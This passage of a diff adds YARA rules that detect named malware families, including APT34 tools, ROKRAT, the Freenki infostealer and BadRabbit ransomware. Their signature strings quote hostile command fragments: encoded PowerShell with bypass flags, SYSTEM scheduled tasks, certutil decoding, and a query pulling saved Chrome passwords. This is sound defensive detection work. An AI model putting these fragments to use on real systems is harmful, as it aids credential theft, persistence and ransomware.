+      $s2 = "DownloadAndExecute" fullword ascii
+      $s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" fullword wide
+      $s4 = "Client.exe" fullword ascii
+      $s5 = "Microsoft -Defender" fullword wide
+      $s6 = "Microsoft- Defender" fullword wide
+      $s7 = "set_RunHidden" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule APT34_Malware_HTA_RID2CC1 : APT DEMO G0049 G0057 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects APT 34 malware"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
+      date = "2017-12-07 10:02:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f6fa94cc8efea0dbd7d4d4ca4cf85ac6da97ee5cf0c59d16a6aafccd2b9d8b9a"
+      tags = "APT, DEMO, G0049, G0057, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "WshShell.run \"cmd.exe /C C:\\ProgramData\\" ascii
+      $x2 = ".bat&ping 127.0.0.1 -n 6 > nul&wscript  /b" ascii
+      $x3 = "cmd.exe /C certutil -f  -decode C:\\ProgramData\\" ascii
+      $x4 = "a.WriteLine(\"set Shell0 = CreateObject(" ascii
+      $x5 = "& vbCrLf & \"Shell0.run" ascii
+      $s1 = "<title>Blog.tkacprow.pl: HTA Hello World!</title>" fullword ascii
+      $s2 = "<body onload=\"test()\">" fullword ascii
+   condition: 
+      filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) )
+}
+
+rule APT34_Malware_Exeruner_RID2F32 : APT DEMO EXE FILE G0049 G0057 MAL MIDDLE_EAST T1053 {
+   meta:
+      description = "Detects APT 34 malware"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
+      date = "2017-12-07 11:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c75c85acf0e0092d688a605778425ba4cb2a57878925eee3dc0f4dd8d636a27a"
+      tags = "APT, DEMO, EXE, FILE, G0049, G0057, MAL, MIDDLE_EAST, T1053"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\obj\\Debug\\exeruner.pdb" ascii
+      $x2 = "\"wscript.shell`\")`nShell0.run" wide
+      $x3 = "powershell.exe -exec bypass -enc \" + ${global:$http_ag} +" wide
+      $x4 = "/c powershell -exec bypass -window hidden -nologo -command " fullword wide
+      $x5 = "\\UpdateTasks\\JavaUpdatesTasksHosts\\" wide
+      $x6 = "schtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn" wide
+      $x7 = "UpdateChecker.ps1 & ping 127.0.0.1" wide
+      $s8 = "exeruner.exe" fullword wide
+      $s9 = "${global:$address1} = $env:ProgramData + \"\\Windows\\Microsoft\\java\";" fullword wide
+      $s10 = "C:\\ProgramData\\Windows\\Microsoft\\java" fullword wide
+      $s11 = "function runByVBS" fullword wide
+      $s12 = "$84e31856-683b-41c0-81dd-a02d8b795026" fullword ascii
+      $s13 = "${global:$dns_ag} = \"aQBmACAAKAAoAEcAZQB0AC0AVwBtAGk" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+}
+
+rule Suspicious_JS_script_content_RID3292 : DEMO SCRIPT T1064 T1117 {
+   meta:
+      description = "Detects suspicious statements in JavaScript files"
+      author = "Florian Roth"
+      reference = "Research on Leviathan https://goo.gl/MZ7dRg"
+      date = "2017-12-02 14:10:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
+      tags = "DEMO, SCRIPT, T1064, T1117"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "new ActiveXObject('WScript.Shell')).Run('cmd /c " ascii
+      $x2 = ".Run('regsvr32 /s /u /i:" ascii
+      $x3 = "new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" fullword ascii
+      $x4 = "args='/s /u /i:" ascii
+   condition: 
+      ( filesize < 10KB and 1 of them )
+}
+
+rule Universal_Exploit_Strings_RID3157 : DEMO EXPLOIT SUSP {
+   meta:
+      description = "Detects a group of strings often used in exploit codes"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2017-12-02 13:18:21"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9b07dacf8a45218ede6d64327c38478640ff17d0f1e525bd392c002e49fe3629"
+      tags = "DEMO, EXPLOIT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Exploit" fullword ascii
+      $s2 = "Payload" fullword ascii
+      $s3 = "CVE-201" ascii
+      $s4 = "bindshell" 
+   condition: 
+      ( filesize < 2KB and 3 of them )
+}
+
+rule UBootRAT_RID29E1 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects UBoot RAT Samples"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
+      date = "2017-11-29 02:00:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "04873dbd63279228a0a4bb1184933b64adb880e874bd3d14078161d06e232c9b"
+      hash2 = "7b32f401e2ad577e8398b2975ecb5c5ce68c5b07717b1e0d762f90a6fbd8add1"
+      hash3 = "42d8a84cd49ff3afacf3d549fbab1fa80d5eda0c8625938b6d32e18004b0edac"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "URLDownloadToFileA" ascii
+      $s2 = "GetModuleFileNameW" ascii
+      $s4 = "WININET.dll" ascii
+      $s5 = "urlmon.dll" ascii
+      $s6 = "WTSAPI32.dll" ascii
+      $s7 = "IPHLPAPI.DLL" ascii
+      $op1 = { 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
+               69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
+               74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
+               6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 } 
+      $vprotect = { 2E 76 6D 70 30 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and uint32 ( uint32 ( 0x3c ) ) == 0x4550 and filesize < 1400KB and filesize > 800KB and ( all of ( $s* ) and $op1 at 64 and uint16 ( uint32 ( 0x3c ) + 11 ) == 0x59 and $vprotect in ( 600 .. 700 ) )
+}
+
+rule UBootRAT_Dropper_RID2D1C : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects UBootRAT Dropper"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
+      date = "2017-11-29 10:17:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f4c659238ffab95e87894d2c556f887774dce2431e8cb87f881df4e4d26253a3"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GetCurrenvackageId" fullword ascii
+      $s2 = "fghijklmnopq" fullword ascii
+      $s3 = "23456789:;<=>?@ABCDEFGHIJKLMNOPQ" fullword ascii
+      $s4 = "PMM/dd/y" fullword ascii
+      $s5 = "bad all" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule ROKRAT_Dropper_Nov17_RID2E19 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects dropper for ROKRAT malware"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+      date = "2017-11-28 11:00:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14"
+      hash2 = "a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2500KB and pe.imphash ( ) == "c6187b1b5f4433318748457719dd6f39"
+}
+
+rule Freeenki_Infostealer_Nov17_RID310F : DEMO EXE FILE MAL T1003 T1085 {
+   meta:
+      description = "Detects Freenki infostealer malware"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+      date = "2017-11-28 13:06:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
+      tags = "DEMO, EXE, FILE, MAL, T1003, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "base64Encoded=\"TVqQAAMAAAAEAAAA" ascii
+      $x2 = "command =outFile &\" sysupdate\"" fullword ascii
+      $x3 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
+      $s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
+      $s2 = "c:\\TEMP\\CrashReports\\" ascii
+      $s3 = "objShell.run command, 0, True" fullword ascii
+      $s4 = "sysDir = shell.ExpandEnvironmentStrings(\"%windir%\")" fullword ascii
+      $s5 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
+      $s6 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
+      $a1 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+      $a2 = "SELECT username_value, password_value, signon_realm FROM logins" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of them or all of ( $a* ) )
+}
+
+rule Freeenki_Infostealer_Nov17_Export_Sig_Testing_RID38AF : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Freenki infostealer malware"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
+      date = "2017-11-28 18:31:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.6.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and pe.exports ( "getUpdate" ) and pe.number_of_exports == 1
+}
+
+rule ROKRAT_Nov17_1_RID2B6E : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects ROKRAT malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-11-28 09:06:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\T+M\\Result\\DocPrint.pdb" ascii
+      $s2 = "d:\\HighSchool\\version 13\\2ndBD" ascii
+      $s3 = "e:\\Happy\\Work\\Source\\version" ascii
+      $x1 = "\\appdata\\local\\svchost.exe" ascii
+      $x2 = "c:\\temp\\esoftscrap.jpg" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 15000KB and 1 of them )
+}
+
+rule OilRig_Malware_Nov17_13_RID2F3C : DEMO EXE FILE G0049 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects OilRig DNSCat malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ClearskySec/status/933280188733018113"
+      date = "2017-11-22 11:48:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4f1e2df85c538875a7da877719555e21c33a558ac121eb715cf4e779d77ab445"
+      tags = "DEMO, EXE, FILE, G0049, MAL, MIDDLE_EAST"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "\\Release\\dnscat2.pdb" ascii
+      $x2 = "cscript.exe //T:20 //Nologo " fullword ascii
+      $a1 = "taskkill /F /IM cscript.exe" fullword ascii
+      $a2 = "cmd.exe /c " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "0160250adfc97f9d4a12dd067323ec61" or 1 of ( $x* ) or all of ( $a* ) )
+}
+
+rule Webshell_FOPO_Obfuscation_APT_ON_Nov17_1_RID3580 : APT DEMO FILE MAL NK OBFUS T1100 WEBSHELL {
+   meta:
+      description = "Detects malware from NK APT incident DE"
+      author = "Florian Roth"
+      reference = "Internal Research - ON"
+      date = "2017-11-17 16:15:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2020-07-31"
+      hash1 = "ed6e2e0027d3f564f5ce438984dc8a54577df822ce56ce079c60c99a91d5ffb1"
+      tags = "APT, DEMO, FILE, MAL, NK, OBFUS, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Obfuscation provided by FOPO" fullword ascii
+      $s1 = "\";@eval($" ascii
+      $f1 = { 22 29 29 3B 0D 0A 3F 3E } 
+   condition: 
+      uint16 ( 0 ) == 0x3f3c and filesize < 800KB and ( $x1 or ( $s1 in ( 0 .. 350 ) and $f1 at ( filesize - 23 ) ) )
+}
+
+rule Volgmer_Malware_RID2D15 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Volgmer malware as reported in US CERT TA17-318B"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+      date = "2017-11-15 10:16:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd"
+      hash2 = "8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b"
+      hash3 = "eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "User-Agent: Mozillar/5.0" fullword ascii
+      $x2 = "[Cmd] - CMD_BOTCMD_CONNLOG_GET" fullword wide
+      $x3 = "[TestConnect To Bot] - Port = %d" fullword ascii
+      $x4 = "b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7" ascii
+      $s1 = "%sigfx%c%c%c.exe" fullword wide
+      $s2 = "H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT" fullword ascii
+      $s3 = "cmd.exe /c %s > %s 2>&1" fullword wide
+      $s4 = "%s\\dllcache\\%s.dll" fullword ascii
+      $s5 = "Cond Fail." fullword ascii
+      $s6 = "The %s %s%s" fullword ascii
+      $s7 = "%s \"%s\"%s \"%s\" %s \"%s\"" fullword ascii
+      $s8 = "DLL_Spider.dll" fullword ascii
+   condition: 
+      filesize < 400KB and ( 1 of ( $x* ) or ( uint16 ( 0 ) == 0x5a4d and 2 of them ) ) or ( uint16 ( 0 ) == 0x5a4d and pe.imphash ( ) == "ea42395e901b33bad504798e0f0fd74b" )
+}
+
+rule HiddenCobra_FallChill_1_RID2F9E : APT DEMO EXE FILE G0032 NK T1117 {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
+      date = "2017-11-15 12:04:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a606716355035d4a1ea0b15f3bee30aad41a2c32df28c2d468eafd18361d60d6"
+      tags = "APT, DEMO, EXE, FILE, G0032, NK, T1117"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "REGSVR32.EXE.MUI" fullword wide
+      $s2 = "Microsoft Corporation. All rights reserved." fullword wide
+      $s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
+      $s4 = "\" goto Loop" fullword ascii
+      $e1 = "xolhvhlxpvg" fullword ascii
+      $e2 = "tvgslhgybmanv" fullword ascii
+      $e3 = "CivagvTllosvok32Smakhslg" fullword ascii
+      $e4 = "GvgCfiivmgDrivxglibW" fullword ascii
+      $e5 = "OkvmPilxvhhTlpvm" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "6135d9bc3591ae7bc72d070eadd31755" or 3 of ( $s* ) or 4 of them )
+}
+
+rule HiddenCobra_FallChill_2_RID2F9F : APT DEMO EXE FILE G0032 NK {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
+      date = "2017-11-15 12:05:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0a118eb23399000d148186b9079fa59caf4c3faa7e7a8f91533e467ac9b6ff41"
+      tags = "APT, DEMO, EXE, FILE, G0032, NK"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "%s\\%s.dll" fullword wide
+      $s2 = "yurdkr.dll" fullword ascii
+      $s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "cb36dcb9909e29a38c387b8a87e7e4ed" or ( 2 of them ) )
+}
+
+rule Reaver3_Malware_Nov17_1_RID2F5B : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+      date = "2017-11-11 11:53:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1813f10bcf74beb582c824c64fff63cb150d178bef93af81d875ca84214307a1"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "CPL.dll" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "e722dd50a0e2bc0cab8ca35fc4bf6d99" and all of them )
+}
+
+rule Reaver3_Malware_Nov17_2_RID2F5C : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+      date = "2017-11-11 11:53:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "9213f70bce491991c4cbbbd7dc3e67d3a3d535b965d7064973b35c50f265e59b"
+      hash2 = "98eb5465c6330b9b49df2e7c9ad0b1164aa5b35423d9e80495a178eb510cdc1c"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "WindowsUpdateReaver" fullword wide
+      $s1 = "\\WUpdate.~tmp" ascii
+      $s2 = "\\~WUpdate.lnk" ascii
+      $s3 = "\\services\\" ascii
+      $s4 = "moomjufps" fullword ascii
+      $s5 = "gekmomkege" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "837cc5062a0758335b257ea3b27972b2" or 1 of ( $x* ) or 3 of them )
+}
+
+rule SunOrcal_Malware_Nov17_1_RID2FEA : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+      date = "2017-11-11 12:17:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cb7c0cf1750baaa11783e93369230ee666b9f3da7298e4d1bb9a07af6a439f2f"
+      hash2 = "799139b5278dc2ac24279cc6c3db44f4ef0ea78ee7b721b0ace38fd8018c51ac"
+      hash3 = "38ea33dab0ba2edd16ecd98cba161c550d1036b253c8666c4110d198948329fb"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "kQZ6l5t1kAlsjmBzsCZPrSpQn5tFrChLtTdsgTlOsClKt5pBsDdFrSVshnxMr6ZOpn9slndBsy1jq6lIr216rSNApn9P" fullword ascii
+      $x2 = { 00 00 00 00 00 00 00 00 00 00 00 00 21 21 21 73
+              79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 00 } 
+      $x3 = "!!!url!!!" fullword ascii
+      $x4 = "h4NcbkdLrCpFpPQ=" fullword ascii
+      $x5 = "GloablCryptNv1" fullword ascii
+      $x6 = "Gloabl\\CryptNv1" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+}
+
+rule CrunchRAT_RID2A5B : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects CrunchRAT_RID2A5B - file CrunchRAT_RID2A5B.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/t3ntman/CrunchRAT_RID2A5B"
+      date = "2017-11-03 05:23:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "58a07e96497745b6fd5075d569f17b0254c3e50b0234744e0487f7c5dddf7161"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "----CrunchRAT_RID2A5B" fullword wide
+      $x2 = "\\Debug\\CrunchRAT_RID2A5B" ascii
+      $x3 = "\\Release\\CrunchRAT_RID2A5B" ascii
+      $s1 = "runCommand" fullword ascii
+      $s2 = "<action>download<action>" fullword wide
+      $s3 = "Content-Disposition: form-data; name=action" fullword wide
+      $s4 = "<action>upload<action>" fullword wide
+      $s5 = "/update.php" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and 3 of them )
+}
+
+rule PowerShell_Mal_HackTool_Gen_RID317C : DEMO GEN HKTL MAL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects PowerShell hack tool samples - generic PE loader"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-11-02 13:24:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d442304ca839d75b34e30e49a8b9437b5ab60b74d85ba9005642632ce7038b32"
+      tags = "DEMO, GEN, HKTL, MAL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$PEBytes32 = 'TVqQAAMAAAAEAAAA" wide
+      $x2 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword wide
+      $x3 = "@($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword wide
+      $x4 = "(Shellcode: LoadLibraryA.asm)" fullword wide
+   condition: 
+      filesize < 8000KB and 1 of them
+}
+
+rule Silence_malware_1_RID2DAC : DEMO EXE FILE G0091 MAL {
+   meta:
+      description = "Detects malware sample mentioned in the Silence report on Securelist"
+      author = "Florian Roth"
+      reference = "https://securelist.com/the-silence/83009/"
+      date = "2017-11-01 10:41:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f24b160e9e9d02b8e31524b8a0b30e7cdc66dd085e24e4c58240e4c4b6ec0ac2"
+      tags = "DEMO, EXE, FILE, G0091, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "adobeudp.exe" fullword wide
+      $x2 = "%s\\adobeudp.exeZone.Identifier" fullword ascii
+      $x3 = "%s\\igfxpers_%08x.exe" fullword ascii
+      $x4 = "%s\\adobeudp.exe" fullword ascii
+      $s1 = "SoftWare\\MicroSoft\\Windows\\CurrentVersion\\Run" fullword ascii
+      $s2 = "Copyright (C)  1999 - 2017" fullword wide
+      $s3 = "%sget.php?name=%x" fullword ascii
+      $s4 = "VNASSRUNXYC" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e03edb9bd7cbe200dc59f361db847f8a" or 1 of ( $x* ) or 3 of them )
+}
+
+rule BadRabbit_Gen_RID2BE5 : CRIME DEMO EXE FILE GEN MAL RANSOM T1047 T1050 T1053 T1085 {
+   meta:
+      description = "Detects BadRabbit Ransomware"
+      author = "Florian Roth"
+      reference = "https://pastebin.com/Y7pJv3tK"
+      date = "2017-10-25 09:26:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
+      hash2 = "579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648"
+      hash3 = "630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da"
+      tags = "CRIME, DEMO, EXE, FILE, GEN, MAL, RANSOM, T1047, T1050, T1053, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST" fullword wide
+      $x2 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\"" fullword wide
+      $x3 = "C:\\Windows\\infpub.dat" fullword wide
+      $x4 = "C:\\Windows\\cscc.dat" fullword wide
+      $s1 = "need to do is submit the payment and get the decryption password." fullword ascii
+      $s2 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
+      $s3 = "\\\\.\\pipe\\%ws" fullword wide
+      $s4 = "fsutil usn deletejournal /D %c:" fullword wide
+      $s5 = "Run DECRYPT app at your desktop after system boot" fullword ascii
+      $s6 = "Files decryption completed" fullword wide
+      $s7 = "Disable your anti-virus and anti-malware programs" fullword wide
+      $s8 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
+      $s9 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
+      $s10 = "%ws C:\\Windows\\%ws,#1 %ws" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule BadRabbit_Mimikatz_Comp_RID2FFF : DEMO EXE FILE MAL S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://pastebin.com/Y7pJv3tK"
+      date = "2017-10-25 12:21:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035"
+      tags = "DEMO, EXE, FILE, MAL, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%lS%lS%lS:%lS" fullword wide
+      $s2 = "lsasrv" fullword wide
+      $s3 = "CredentialKeys" ascii
+      $s4 = { 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 3 of them )
+}
+
+rule KasperMalware_Oct17_1_RID2EBD : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Kasper Backdoor"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-10-24 11:27:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "758bdaf26a0bd309a5458cb4569fe1c789cf5db087880d6d1676dec051c3a28d"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "\\Release\\kasper.pdb" ascii
+      $x2 = "C:\\D@oc@um@en@ts a@nd Set@tings\\Al@l Users" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 7000KB and ( pe.imphash ( ) == "2bceb64cf37acd34bc33b38f2cddfb61" or 1 of them )
+}
+
+rule Sofacy_Oct17_1_RID2BF3 : APT DEMO EXE FILE G0007 MAL RUSSIA T1085 {
+   meta:
+      description = "Detects Sofacy malware reported in October 2017"
+      author = "Florian Roth"
